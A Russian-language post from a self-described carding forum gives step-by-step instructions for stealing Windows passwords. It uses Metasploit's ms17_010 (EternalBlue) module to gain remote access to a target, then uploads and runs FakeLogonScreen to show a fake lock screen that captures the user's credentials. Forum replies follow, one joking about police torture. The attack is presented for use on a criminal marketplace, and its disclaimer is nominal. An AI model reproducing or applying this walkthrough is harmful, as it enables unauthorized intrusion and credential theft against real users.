Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Взлом пароля Windows с помощью FakeLogonScreen

Download_Link

Участник клуба
Регистрация
7 Июл 2020
Сообщения
404
Реакции
58
Депозит
200$
0e59971b67119de5d58c8.png


FakeLogonScreen — это утилита для имитации экрана входа в систему Windows с целью получения пароля пользователя. Введенный пароль проверяется в Active Directory или на локальном компьютере, чтобы убедиться в его правильности, а затем отображается на консоли или сохраняется на диск.
Инструмент FakeLogonScreen был создан Arris Huijgen. Он разработан на C#, поскольку позволяет различным фреймворкам внедрять утилиту в память. Мы будем удаленно запускать этот инструмент с помощью Metasploit для получения пароля пользователя в системе.

Демонстрация работы утилиты от разработчика:


demo.gif







ДИСКЛЕЙМЕР:

Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!



Сначала качаем FakeLogonScreen с GitHub:
https://github.com/bitsadmin/fakelogonscreen/releases

d1d7eaaad93bc4d233a8f.png



Получаем удалённый доступ к целевой системе (на примере уязвимости "EternalBlue"):
msfconsole

0ae388d612ba25db2533a.png



search ms17_010

77e0020e9e5b5ed2992a8.png



Выбираем подходящий эксплоит:
use 0

147f8a7da411ebe2b9cbc.png



Смотрим опции:
options

d9ce1f448dbda0222f46d.png



Настраиваем опции:
set RHOSTS 192.68.0.12

Запускаем работу эксплоита:

run

Если целевой компьютер имеет уязвимость к данной атаке - мы получим удалённый доступ.

Удаленно запускаем FakeLogonScreen, используя следующий набор команд в MSF:
upload /root/FakeLogonScreen.exe .
shell
FakeLogonScreen.exe

После выполнения он имитирует экран блокировки Windows для получения пароля от пользователя. Для этого этот инструмент будет отображать экран блокировки точно так, как он настроен, чтобы у пользователя не возникло подозрений, как показано на изображении ниже:

uv9Syl9-tn0jgY8q1eifreaezfSu4qwvATmRCFswX_gmhkLEva-aJ52019uz7HGuoworQKPglnLcCLT5bsoVYiZn.jpg



Он будет проверять учетные данные локально или с контроллера домена по мере их ввода пользователем, а затем отображать их на консоли.





 

Usman

Опытный user
Регистрация
18 Июн 2020
Сообщения
129
Реакции
4
ну я даже по гайду не разберусь все равно, для каких-то хацкеров
 

m_lyam

Опытный user
Регистрация
9 Июл 2020
Сообщения
897
Реакции
33
Usman написал(а):
ну я даже по гайду не разберусь все равно, для каких-то хацкеров
очень сложно, старые добрые ментовские пытки эффективнее)
 

Xanthias

Опытный user
Регистрация
3 Апр 2021
Сообщения
802
Реакции
62
Прикольная тема! Спасибо
 
Сверху Снизу